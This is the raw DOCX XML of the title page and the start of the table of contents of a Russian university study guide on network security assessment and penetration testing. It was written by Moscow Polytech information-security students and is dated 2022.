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49CB" w:rsidRPr="00EF49CB" w:rsidRDefault="00EF49CB" w:rsidP="00EF49C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</w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EF49CB" w:rsidRPr="00EF49CB" w:rsidRDefault="00EF49CB" w:rsidP="00EF49CB">
      <w:pPr>
        <w:ind w:firstLine="1418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79FB983" wp14:editId="459CCFF9">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:align>center</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:align>top</wp:align>
                </wp:positionV>
                <wp:extent cx="5953125" cy="2066925"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="233" name="Прямоугольник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2751300"/>
                          <a:ext cx="5943600" cy="20574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01AC4" w:rsidRDefault="00401AC4" w:rsidP="00EF49CB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33" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:0;width:468.75pt;height:162.75pt;z-index:251659264;visibility:visible;mso-wrap-style:square;mso-wrap-distance-left:9pt;mso-wrap-distance-top:0;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:0;mso-position-horizontal:center;mso-position-horizontal-relative:page;mso-position-vertical:top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MWdDAIAAMQDAAAOAAAAZHJzL2Uyb0RvYy54bWysU82O0zAQviPxDpbvNEl/tmzVdIV2VYS0&#10;gkoLD+A6TmPJsc3YbdIbElckHoGH4IL42WdI34ixU7YFboiLM+P5/Hm+8Zf5VVsrshPgpNE5zQYp&#10;JUJzU0i9yemb18snTylxnumCKaNFTvfC0avF40fzxs7E0FRGFQIIkmg3a2xOK+/tLEkcr0TN3MBY&#10;obFYGqiZxxQ2SQGsQfZaJcM0vUgaA4UFw4VzuHvTF+ki8pel4P5VWTrhicop9ubjCnFdhzVZzNls&#10;A8xWkh/bYP/QRc2kxksfqG6YZ2QL8i+qWnIwzpR+wE2dmLKUXEQNqCZL/1BzVzErohYcjrMPY3L/&#10;j5a/3K2AyCKnw9GIEs1qfKTu0+Hd4WP3vbs/vO8+d/fdt8OH7kf3pftKAgpn1lg3w6N3dgXHzGEY&#10;BtCWUIcvSiNtYJ2O8Z0o2WM8nWQjjOPMResJR8Dkcjy6CAAeEOlkOu4RyYnKgvPPhalJCHIK+Khx&#10;1mx36zySIfQXJNzsjJLFUioVk2Akca2A7BhagHEutM9CC3jqN6TSAa9NONmXw04SlPbaQuTbdYvF&#10;EK5NscfROcuXEvu6Zc6vGKB5MkoaNFRO3dstA0GJeqHxxS6z8XCCDozJeDINmuG8sj6vMM0rgz7l&#10;Hijpk2sffdt3+WzrTSmj+lMzx3bRKlHe0dbBi+d5RJ1+vsVPAAAA//8DAFBLAwQUAAYACAAAACEA&#10;nR7Qt90AAAAFAQAADwAAAGRycy9kb3ducmV2LnhtbEyPwU7DMBBE70j8g7VI3KhDoxCaxqkKEiDl&#10;UtLyAdt4SSLidRS7aeDrMVzgstJoRjNv881sejHR6DrLCm4XEQji2uqOGwVvh6ebexDOI2vsLZOC&#10;T3KwKS4vcsy0PXNF0943IpSwy1BB6/2QSenqlgy6hR2Ig/duR4M+yLGResRzKDe9XEbRnTTYcVho&#10;caDHluqP/ckoKMvDa+yr8uHlGXfpdvqqopQqpa6v5u0ahKfZ/4XhBz+gQxGYjvbE2oleQXjE/97g&#10;reI0AXFUEC+TBGSRy//0xTcAAAD//wMAUEsBAi0AFAAGAAgAAAAhALaDOJL+AAAA4QEAABMAAAAA&#10;AAAAAAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAOP0h/9YAAACU&#10;AQAACwAAAAAAAAAAAAAAAAAvAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAgbzFnQwCAADE&#10;AwAADgAAAAAAAAAAAAAAAAAuAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYACAAAACEAnR7Qt90A&#10;AAAFAQAADwAAAAAAAAAAAAAAAABmBAAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA8wAAAHAF&#10;AAAAAA==&#10;" fillcolor="#4f81bd [3204]" stroked="f">
                <v:textbox inset="2.53958mm,1.2694mm,2.53958mm,1.2694mm">
                  <w:txbxContent>
                    <w:p w:rsidR="00401AC4" w:rsidRDefault="00401AC4" w:rsidP="00EF49CB">
                      <w:pPr>
                        <w:spacing w:line="275" w:lineRule="auto"/>
                        <w:jc w:val="center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EF49CB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7B7EC8D9" wp14:editId="49EC1A74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953125" cy="45720"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="234" name="Прямоугольник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3761903"/>
                          <a:ext cx="5943600" cy="3619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01AC4" w:rsidRDefault="00401AC4" w:rsidP="00EF49C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34" o:spid="_x0000_s1027" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:0;width:468.75pt;height:3.6pt;z-index:251660288;visibility:visible;mso-wrap-style:square;mso-wrap-distance-left:9pt;mso-wrap-distance-top:0;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:0;mso-position-horizontal:center;mso-position-horizontal-relative:margin;mso-position-vertical:bottom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EAjBwIAAMkDAAAOAAAAZHJzL2Uyb0RvYy54bWysU02O0zAY3SNxB8t7mqZ/Q6umIzSjIqQR&#10;VJrhAK7jNJYc23x2m3SHxBaJI3AINgiYOUN6Iz47ZVpgh9g4fvbz8/c9v8wvm0qRnQAnjc5o2utT&#10;IjQ3udSbjL69Wz57TonzTOdMGS0yuheOXi6ePpnXdiYGpjQqF0BQRLtZbTNaem9nSeJ4KSrmesYK&#10;jZuFgYp5hLBJcmA1qlcqGfT7k6Q2kFswXDiHq9fdJl1E/aIQ3L8pCic8URnF2nwcIY7rMCaLOZtt&#10;gNlS8mMZ7B+qqJjUeOmj1DXzjGxB/iVVSQ7GmcL3uKkSUxSSi9gDdpP2/+jmtmRWxF7QHGcfbXL/&#10;T5a/3q2AyDyjg+GIEs0qfKT28+H94VP7o304fGi/tA/t98PH9r792n4jgYWe1dbN8OitXcEROZwG&#10;A5oCqvDF1kgTVC9G+E6U7DM6vJik0/6w81w0nnAkjKej4SQQeGAgYRz2k5OQBedfClORMMko4JNG&#10;p9nuxvmO+osS7nVGyXwplYogxEhcKSA7hgFgnAvt0+MFvzGVDnxtwslONKwkoc+uszDzzbqJXkWJ&#10;sLI2+R79c5YvJZZ3w5xfMcAEpZTUmKqMundbBoIS9Urjs03T0WCMMTwHcA7W54BpXhoMK/dASQeu&#10;fAxvV+yLrTeFjCacijlWjXmJNh6zHQJ5jiPr9AcufgIAAP//AwBQSwMEFAAGAAgAAAAhAB+++zra&#10;AAAAAwEAAA8AAABkcnMvZG93bnJldi54bWxMj8FOwzAQRO9I/IO1SNyoQ1EIDXGqqhUSF4RI+YBt&#10;vMQR9jrEbhr+HsOFXlYazWjmbbWenRUTjaH3rOB2kYEgbr3uuVPwvn+6eQARIrJG65kUfFOAdX15&#10;UWGp/YnfaGpiJ1IJhxIVmBiHUsrQGnIYFn4gTt6HHx3GJMdO6hFPqdxZucyye+mw57RgcKCtofaz&#10;OToF+SoPu2l+tWjMfve1LTbPL02n1PXVvHkEEWmO/2H4xU/oUCemgz+yDsIqSI/Ev5u81V2Rgzgo&#10;KJYg60qes9c/AAAA//8DAFBLAQItABQABgAIAAAAIQC2gziS/gAAAOEBAAATAAAAAAAAAAAAAAAA&#10;AAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhADj9If/WAAAAlAEAAAsAAAAA&#10;AAAAAAAAAAAALwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAJ+8QCMHAgAAyQMAAA4AAAAA&#10;AAAAAAAAAAAALgIAAGRycy9lMm9Eb2MueG1sUEsBAi0AFAAGAAgAAAAhAB+++zraAAAAAwEAAA8A&#10;AAAAAAAAAAAAAAAAYQQAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPMAAABoBQAAAAA=&#10;" fillcolor="#4f81bd [3204]" stroked="f">
                <v:textbox inset="2.53958mm,2.53958mm,2.53958mm,2.53958mm">
                  <w:txbxContent>
                    <w:p w:rsidR="00401AC4" w:rsidRDefault="00401AC4" w:rsidP="00EF49CB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:rsidR="00EF49CB" w:rsidRPr="00EF49CB" w:rsidRDefault="00EF49CB" w:rsidP="00EF49CB">
      <w:pPr>
        <w:ind w:firstLine="1418"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EF49CB" w:rsidRPr="00EF49CB" w:rsidRDefault="00EF49CB" w:rsidP="00EF49CB">
      <w:pPr>
        <w:ind w:firstLine="1418"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EF49CB" w:rsidRPr="00EF49CB" w:rsidRDefault="00EF49CB" w:rsidP="00EF49CB">
      <w:pPr>
        <w:ind w:firstLine="1418"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EF49CB" w:rsidRPr="00EF49CB" w:rsidRDefault="00EF49CB" w:rsidP="00EF49CB">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EF49CB" w:rsidRPr="00EF49CB" w:rsidRDefault="00EF49CB" w:rsidP="00EF49CB">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria" w:cs="Cambria"/>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:sz w:val="130"/>
          <w:szCs w:val="130"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EF49CB" w:rsidRPr="00EF49CB" w:rsidRDefault="00EF49CB" w:rsidP="00EF49CB">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria" w:cs="Cambria"/>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:sz w:val="130"/>
          <w:szCs w:val="130"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria" w:cs="Cambria"/>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:sz w:val="130"/>
          <w:szCs w:val="130"/>
        </w:rPr>
        <w:t>Анализ</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF49CB" w:rsidRPr="00EF49CB" w:rsidRDefault="00EF49CB" w:rsidP="00EF49CB">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria" w:cs="Cambria"/>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:sz w:val="130"/>
          <w:szCs w:val="130"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria" w:cs="Cambria"/>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:sz w:val="130"/>
          <w:szCs w:val="130"/>
        </w:rPr>
        <w:t>защищенности</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF49CB" w:rsidRPr="00EF49CB" w:rsidRDefault="00EF49CB" w:rsidP="00EF49CB">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria" w:cs="Cambria"/>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:sz w:val="130"/>
          <w:szCs w:val="130"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria" w:cs="Cambria"/>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:sz w:val="130"/>
          <w:szCs w:val="130"/>
        </w:rPr>
        <w:t>сети</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF49CB" w:rsidRPr="00EF49CB" w:rsidRDefault="00EF49CB" w:rsidP="00EF49CB">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria" w:cs="Cambria"/>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EF49CB" w:rsidRPr="00EF49CB" w:rsidRDefault="00EF49CB" w:rsidP="00EF49CB">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria" w:cs="Cambria"/>
          <w:i/>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria" w:cs="Cambria"/>
          <w:i/>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>Учебно-методическое пособие</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF49CB" w:rsidRPr="00EF49CB" w:rsidRDefault="00EF49CB" w:rsidP="00EF49CB">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EF49CB" w:rsidRPr="00EF49CB" w:rsidRDefault="00EF49CB" w:rsidP="00EF49CB">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EF49CB" w:rsidRPr="00EF49CB" w:rsidRDefault="00EF49CB" w:rsidP="00EF49CB">
      <w:pPr>
        <w:pStyle w:val="af7"/>
        <w:spacing w:before="0" w:after="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Данное пособие создано в рамках </w:t>
      </w:r>
      <w:r w:rsidR="00401AC4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Инженерного проекта</w:t>
      </w:r>
      <w:r w:rsidR="00401AC4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> студентами второго и третьего курса информационной безопасности. Пособие направлено на помощь студентам Московского Политеха в освоении анализа защищенности сети доступными ресурсами.</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Отредактировано и актуализировано студентами третьего курса информационной безопасности в рамках дисциплины </w:t>
      </w:r>
      <w:r w:rsidR="00401AC4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Проектная деятельность</w:t>
      </w:r>
      <w:r w:rsidR="00401AC4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF49CB" w:rsidRPr="00EF49CB" w:rsidRDefault="00EF49CB" w:rsidP="00EF49CB">
      <w:pPr>
        <w:pStyle w:val="af7"/>
        <w:spacing w:before="0" w:after="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Все материалы предоставлены компанией </w:t>
      </w:r>
      <w:r w:rsidR="00401AC4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Эшелон</w:t>
      </w:r>
      <w:r w:rsidR="00401AC4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF49CB" w:rsidRPr="00EF49CB" w:rsidRDefault="00EF49CB" w:rsidP="00EF49CB">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF49CB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2CF8AF04" wp14:editId="5B5EF355">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:posOffset>-8571</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="margin">
                  <wp:posOffset>8790623</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5953125" cy="370882"/>
                <wp:effectExtent l="0" t="0" r="0" b="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3603788"/>
                          <a:ext cx="5943600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01AC4" w:rsidRDefault="00401AC4" w:rsidP="00EF49CB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i/>
                                <w:color w:val="4F81BD"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t>Москва 2022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9" o:spid="_x0000_s1028" style="position:absolute;left:0;text-align:left;margin-left:-.65pt;margin-top:692.2pt;width:468.75pt;height:29.2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nq4+AEAAJwDAAAOAAAAZHJzL2Uyb0RvYy54bWysU82O0zAQviPxDpbvNGnabtuo6QqxKkJa&#10;QaWFB3Adu7EU/2C7TXpD4orEI/AQe0H87DOkb8TY6e4WuCEurmfm6+dvvpksLltZoz2zTmhV4OEg&#10;xYgpqkuhtgV+93b1bIaR80SVpNaKFfjAHL5cPn2yaEzOMl3pumQWAYlyeWMKXHlv8iRxtGKSuIE2&#10;TEGRayuJh9Buk9KSBthlnWRpepE02pbGasqcg+xVX8TLyM85o/4N5455VBcYtPl42nhuwpksFyTf&#10;WmIqQU8yyD+okEQoePSB6op4gnZW/EUlBbXaae4HVMtEcy4oiz1AN8P0j25uKmJY7AXMcebBJvf/&#10;aOnr/doiURY4y+YYKSJhSN2X44fj5+5Hd3f82N12d93346fuZ/e1+4YCCjxrjMvhrzdmbU+Rg2sw&#10;oOVWhl9oDbXAOpqOYU4YHQo8ukhH09ms95y1HlEATOZjyAOABsQkG2eTAEgemYx1/iXTEoVLgS3M&#10;NFpN9tfO99B7SHhY6ZWoa8iTvFa/JYAzZJIgvpcbbr7dtL0B941tdHkAU5yhKwFPXhPn18TCWgwx&#10;amBVCuze74hlGNWvFMxiPgyikY/BeDIN3djzyua8QhStNGzgBqP++sLHfeylPt95zUVsK4jrpZw0&#10;wwpEY07rGnbsPI6ox49q+QsAAP//AwBQSwMEFAAGAAgAAAAhAKldNwzgAAAADAEAAA8AAABkcnMv&#10;ZG93bnJldi54bWxMj8tOwzAQRfdI/IM1SOxa5+FGbohTFSTEikUKH+DGQxKI7Sh229CvZ1jBcu4c&#10;3TlT7RY7sjPOYfBOQbpOgKFrvRlcp+D97XklgYWondGjd6jgGwPs6tubSpfGX1yD50PsGJW4UGoF&#10;fYxTyXloe7Q6rP2EjnYffrY60jh33Mz6QuV25FmSFNzqwdGFXk/41GP7dThZBWLZ7FOZNxuct7II&#10;L831+vj6qdT93bJ/ABZxiX8w/OqTOtTkdPQnZwIbFazSnEjKcykEMCK2eZEBO1IkRCaB1xX//0T9&#10;AwAA//8DAFBLAQItABQABgAIAAAAIQC2gziS/gAAAOEBAAATAAAAAAAAAAAAAAAAAAAAAABbQ29u&#10;dGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhADj9If/WAAAAlAEAAAsAAAAAAAAAAAAAAAAA&#10;LwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAO+Oerj4AQAAnAMAAA4AAAAAAAAAAAAAAAAA&#10;LgIAAGRycy9lMm9Eb2MueG1sUEsBAi0AFAAGAAgAAAAhAKldNwzgAAAADAEAAA8AAAAAAAAAAAAA&#10;AAAAUgQAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPMAAABfBQAAAAA=&#10;" filled="f" stroked="f">
                <v:textbox inset="2.53958mm,1.2694mm,2.53958mm,1.2694mm">
                  <w:txbxContent>
                    <w:p w:rsidR="00401AC4" w:rsidRDefault="00401AC4" w:rsidP="00EF49CB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rFonts w:ascii="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria" w:cs="Cambria"/>
                          <w:i/>
                          <w:color w:val="4F81BD"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t>Москва 2022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Pr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF49CB" w:rsidRPr="00401AC4" w:rsidRDefault="00EF49CB" w:rsidP="00347A12">
      <w:pPr>
        <w:keepNext/>
        <w:keepLines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D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00401AC4">
        <w:rPr>
          <w:b/>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Оглавление</w:t>
      </w:r>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
        </w:rPr>
        <w:id w:val="-550848828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color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:p w:rsidR="00CF7B6D" w:rsidRPr="00DE2FD7" w:rsidRDefault="00401AC4">
          <w:pPr>
            <w:pStyle w:val="11"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00DE2FD7">
            <w:rPr>
              <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidRPr="00DE2FD7">
            <w:rPr>
              <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> TOC \o "1-3" \h \z \u </w:instrText>
          </w:r>
          <w:r w:rsidRPr="00DE2FD7">
            <w:rPr>
              <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_Toc107513720" w:history="1">
            <w:r w:rsidR="00CF7B6D" w:rsidRPr="00DE2FD7">
              <w:rPr>
                <w:rStyle w:val="a7"/>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:noProof/>
                <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
              </w:rPr>
              <w:t>Раздел 1. Введение в тестирование на проникновение</w:t>
            </w:r>
            <w:r w:rsidR="00CF7B6D" w:rsidRPr="00DE2FD7">
              <w:rPr>
                <w:noProof/>
